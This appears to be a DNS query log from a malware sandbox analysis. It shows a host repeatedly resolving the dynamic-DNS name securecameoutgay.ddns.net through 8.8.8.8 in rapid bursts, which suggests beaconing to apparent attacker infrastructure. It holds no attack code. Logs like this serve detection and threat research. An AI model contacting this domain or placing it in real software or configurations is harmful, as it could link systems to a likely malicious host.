                                                    Oct 12, 2024 23:05:35.488081932 CEST192.168.2.148.8.8.80xb9aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.494784117 CEST192.168.2.148.8.8.80xb9aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.501205921 CEST192.168.2.148.8.8.80x464eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.507639885 CEST192.168.2.148.8.8.80x464eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.514277935 CEST192.168.2.148.8.8.80x464eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.521452904 CEST192.168.2.148.8.8.80x464eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.528682947 CEST192.168.2.148.8.8.80x464eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.535217047 CEST192.168.2.148.8.8.80x1f6cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.542579889 CEST192.168.2.148.8.8.80x1f6cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.550865889 CEST192.168.2.148.8.8.80x1f6cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.557666063 CEST192.168.2.148.8.8.80x1f6cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.565104008 CEST192.168.2.148.8.8.80x1f6cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.573921919 CEST192.168.2.148.8.8.80xc8caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.582941055 CEST192.168.2.148.8.8.80xc8caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.592628002 CEST192.168.2.148.8.8.80xc8caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.602689028 CEST192.168.2.148.8.8.80xc8caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.611514091 CEST192.168.2.148.8.8.80xc8caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.618546963 CEST192.168.2.148.8.8.80x22e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.624835968 CEST192.168.2.148.8.8.80x22e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.631262064 CEST192.168.2.148.8.8.80x22e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.638151884 CEST192.168.2.148.8.8.80x22e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.645515919 CEST192.168.2.148.8.8.80x22e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.652153015 CEST192.168.2.148.8.8.80x1858Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.658678055 CEST192.168.2.148.8.8.80x1858Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.666199923 CEST192.168.2.148.8.8.80x1858Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.672971010 CEST192.168.2.148.8.8.80x1858Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.679467916 CEST192.168.2.148.8.8.80x1858Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.686273098 CEST192.168.2.148.8.8.80x7cbeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.693573952 CEST192.168.2.148.8.8.80x7cbeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.700252056 CEST192.168.2.148.8.8.80x7cbeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.707041025 CEST192.168.2.148.8.8.80x7cbeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.713344097 CEST192.168.2.148.8.8.80x7cbeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.719888926 CEST192.168.2.148.8.8.80xe327Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.726320982 CEST192.168.2.148.8.8.80xe327Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.733165026 CEST192.168.2.148.8.8.80xe327Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.739886045 CEST192.168.2.148.8.8.80xe327Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.746742964 CEST192.168.2.148.8.8.80xe327Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.754220963 CEST192.168.2.148.8.8.80x5dc6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.761259079 CEST192.168.2.148.8.8.80x5dc6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.767847061 CEST192.168.2.148.8.8.80x5dc6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.774384022 CEST192.168.2.148.8.8.80x5dc6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.780714989 CEST192.168.2.148.8.8.80x5dc6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.787430048 CEST192.168.2.148.8.8.80xe029Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.794065952 CEST192.168.2.148.8.8.80xe029Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.800822020 CEST192.168.2.148.8.8.80xe029Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.809236050 CEST192.168.2.148.8.8.80xe029Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.815959930 CEST192.168.2.148.8.8.80xe029Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.822443008 CEST192.168.2.148.8.8.80x2a82Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.829026937 CEST192.168.2.148.8.8.80x2a82Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.836285114 CEST192.168.2.148.8.8.80x2a82Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.843637943 CEST192.168.2.148.8.8.80x2a82Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.856017113 CEST192.168.2.148.8.8.80x2a82Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.863009930 CEST192.168.2.148.8.8.80xf342Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.869817019 CEST192.168.2.148.8.8.80xf342Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.876935959 CEST192.168.2.148.8.8.80xf342Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.883460999 CEST192.168.2.148.8.8.80xf342Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.890090942 CEST192.168.2.148.8.8.80xf342Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.897011995 CEST192.168.2.148.8.8.80xc01fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.904130936 CEST192.168.2.148.8.8.80xc01fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.911001921 CEST192.168.2.148.8.8.80xc01fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.917648077 CEST192.168.2.148.8.8.80xc01fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.924628019 CEST192.168.2.148.8.8.80xc01fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.931442976 CEST192.168.2.148.8.8.80xb5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.938524961 CEST192.168.2.148.8.8.80xb5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.945307970 CEST192.168.2.148.8.8.80xb5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.952450991 CEST192.168.2.148.8.8.80xb5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.959249973 CEST192.168.2.148.8.8.80xb5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.966067076 CEST192.168.2.148.8.8.80x229cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.975894928 CEST192.168.2.148.8.8.80x229cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.982630968 CEST192.168.2.148.8.8.80x229cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.989622116 CEST192.168.2.148.8.8.80x229cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.996738911 CEST192.168.2.148.8.8.80x229cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.003364086 CEST192.168.2.148.8.8.80x24efStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.010049105 CEST192.168.2.148.8.8.80x24efStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.017036915 CEST192.168.2.148.8.8.80x24efStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.023860931 CEST192.168.2.148.8.8.80x24efStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.030611992 CEST192.168.2.148.8.8.80x24efStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.037322044 CEST192.168.2.148.8.8.80xe7c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.043966055 CEST192.168.2.148.8.8.80xe7c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.050600052 CEST192.168.2.148.8.8.80xe7c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.057714939 CEST192.168.2.148.8.8.80xe7c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.064794064 CEST192.168.2.148.8.8.80xe7c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.072120905 CEST192.168.2.148.8.8.80x866bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.079202890 CEST192.168.2.148.8.8.80x866bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.085678101 CEST192.168.2.148.8.8.80x866bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.092319012 CEST192.168.2.148.8.8.80x866bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.098978043 CEST192.168.2.148.8.8.80x866bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.106481075 CEST192.168.2.148.8.8.80xb9bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.113542080 CEST192.168.2.148.8.8.80xb9bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.120347977 CEST192.168.2.148.8.8.80xb9bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.127296925 CEST192.168.2.148.8.8.80xb9bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.134397030 CEST192.168.2.148.8.8.80xb9bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.141017914 CEST192.168.2.148.8.8.80x5a83Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.147815943 CEST192.168.2.148.8.8.80x5a83Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.154752970 CEST192.168.2.148.8.8.80x5a83Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.161489010 CEST192.168.2.148.8.8.80x5a83Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.168183088 CEST192.168.2.148.8.8.80x5a83Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.174916029 CEST192.168.2.148.8.8.80xe6fcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.181864977 CEST192.168.2.148.8.8.80xe6fcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.188729048 CEST192.168.2.148.8.8.80xe6fcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.195343971 CEST192.168.2.148.8.8.80xe6fcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.202223063 CEST192.168.2.148.8.8.80xe6fcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.208779097 CEST192.168.2.148.8.8.80xbb04Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.215420961 CEST192.168.2.148.8.8.80xbb04Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.222304106 CEST192.168.2.148.8.8.80xbb04Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.228837967 CEST192.168.2.148.8.8.80xbb04Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.235801935 CEST192.168.2.148.8.8.80xbb04Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.243726015 CEST192.168.2.148.8.8.80x6951Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.250497103 CEST192.168.2.148.8.8.80x6951Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.257215977 CEST192.168.2.148.8.8.80x6951Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.263906956 CEST192.168.2.148.8.8.80x6951Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.270680904 CEST192.168.2.148.8.8.80x6951Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.277519941 CEST192.168.2.148.8.8.80xa320Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.284392118 CEST192.168.2.148.8.8.80xa320Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.291143894 CEST192.168.2.148.8.8.80xa320Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.298202991 CEST192.168.2.148.8.8.80xa320Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.305277109 CEST192.168.2.148.8.8.80xa320Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.312808037 CEST192.168.2.148.8.8.80x2ed7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.319467068 CEST192.168.2.148.8.8.80x2ed7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.327961922 CEST192.168.2.148.8.8.80x2ed7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.334608078 CEST192.168.2.148.8.8.80x2ed7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.341981888 CEST192.168.2.148.8.8.80x2ed7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.348927021 CEST192.168.2.148.8.8.80x13c0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.355671883 CEST192.168.2.148.8.8.80x13c0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.362406015 CEST192.168.2.148.8.8.80x13c0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.368793964 CEST192.168.2.148.8.8.80x13c0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.375823021 CEST192.168.2.148.8.8.80x13c0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.382786989 CEST192.168.2.148.8.8.80xd966Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.389318943 CEST192.168.2.148.8.8.80xd966Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.396075964 CEST192.168.2.148.8.8.80xd966Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.402806044 CEST192.168.2.148.8.8.80xd966Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.409801006 CEST192.168.2.148.8.8.80xd966Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.416959047 CEST192.168.2.148.8.8.80xbab2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.423712969 CEST192.168.2.148.8.8.80xbab2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.430279016 CEST192.168.2.148.8.8.80xbab2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.436908007 CEST192.168.2.148.8.8.80xbab2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.443649054 CEST192.168.2.148.8.8.80xbab2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.450407028 CEST192.168.2.148.8.8.80x5925Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.457410097 CEST192.168.2.148.8.8.80x5925Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.464240074 CEST192.168.2.148.8.8.80x5925Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.470757961 CEST192.168.2.148.8.8.80x5925Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.477370024 CEST192.168.2.148.8.8.80x5925Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.483725071 CEST192.168.2.148.8.8.80x5253Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.490638971 CEST192.168.2.148.8.8.80x5253Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.497134924 CEST192.168.2.148.8.8.80x5253Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.503535986 CEST192.168.2.148.8.8.80x5253Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.510279894 CEST192.168.2.148.8.8.80x5253Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.517067909 CEST192.168.2.148.8.8.80x963fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.523744106 CEST192.168.2.148.8.8.80x963fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.530939102 CEST192.168.2.148.8.8.80x963fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.537692070 CEST192.168.2.148.8.8.80x963fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.544471025 CEST192.168.2.148.8.8.80x963fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.551342010 CEST192.168.2.148.8.8.80x7419Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.558058977 CEST192.168.2.148.8.8.80x7419Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.564838886 CEST192.168.2.148.8.8.80x7419Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.574678898 CEST192.168.2.148.8.8.80x7419Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.581089020 CEST192.168.2.148.8.8.80x7419Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.587743998 CEST192.168.2.148.8.8.80x1568Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.594476938 CEST192.168.2.148.8.8.80x1568Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.601223946 CEST192.168.2.148.8.8.80x1568Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.607939005 CEST192.168.2.148.8.8.80x1568Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.614532948 CEST192.168.2.148.8.8.80x1568Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.621207952 CEST192.168.2.148.8.8.80x4b78Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.628153086 CEST192.168.2.148.8.8.80x4b78Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.634848118 CEST192.168.2.148.8.8.80x4b78Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.641484976 CEST192.168.2.148.8.8.80x4b78Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.648122072 CEST192.168.2.148.8.8.80x4b78Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.654938936 CEST192.168.2.148.8.8.80xa312Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.661400080 CEST192.168.2.148.8.8.80xa312Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.667946100 CEST192.168.2.148.8.8.80xa312Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.674777031 CEST192.168.2.148.8.8.80xa312Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.681402922 CEST192.168.2.148.8.8.80xa312Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.688292980 CEST192.168.2.148.8.8.80xb815Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.694946051 CEST192.168.2.148.8.8.80xb815Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.701703072 CEST192.168.2.148.8.8.80xb815Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.708475113 CEST192.168.2.148.8.8.80xb815Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.715423107 CEST192.168.2.148.8.8.80xb815Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.722119093 CEST192.168.2.148.8.8.80xb36dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.728832006 CEST192.168.2.148.8.8.80xb36dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.735508919 CEST192.168.2.148.8.8.80xb36dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.742011070 CEST192.168.2.148.8.8.80xb36dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.749088049 CEST192.168.2.148.8.8.80xb36dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.755784035 CEST192.168.2.148.8.8.80xb95aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.762300968 CEST192.168.2.148.8.8.80xb95aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.768982887 CEST192.168.2.148.8.8.80xb95aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.775793076 CEST192.168.2.148.8.8.80xb95aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.782608986 CEST192.168.2.148.8.8.80xb95aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.789524078 CEST192.168.2.148.8.8.80xff33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
